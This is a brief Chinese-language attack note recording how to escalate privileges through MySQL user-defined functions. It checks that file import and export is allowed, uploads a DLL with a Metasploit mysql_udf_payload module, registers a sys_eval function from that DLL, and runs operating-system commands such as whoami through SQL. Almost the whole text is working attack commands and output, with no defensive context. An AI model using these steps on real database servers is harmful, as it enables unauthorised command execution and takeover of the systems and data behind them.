UDF提权记录

mysql 要具有导入导出权限

show global variables like '%secure%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | OFF   |
| secure_file_priv |       |
+------------------+-------+
2 rows in set (0.00 sec)

msf exploit(multi/mysql/mysql_udf_payload)

查看上传的dll名字

select * from mysql.func where name = "sys_exec";

通过msf上传的dll创建执行命令函数

create function sys_eval returns string soname "xxxx.dll";

select sys_eval("whoami")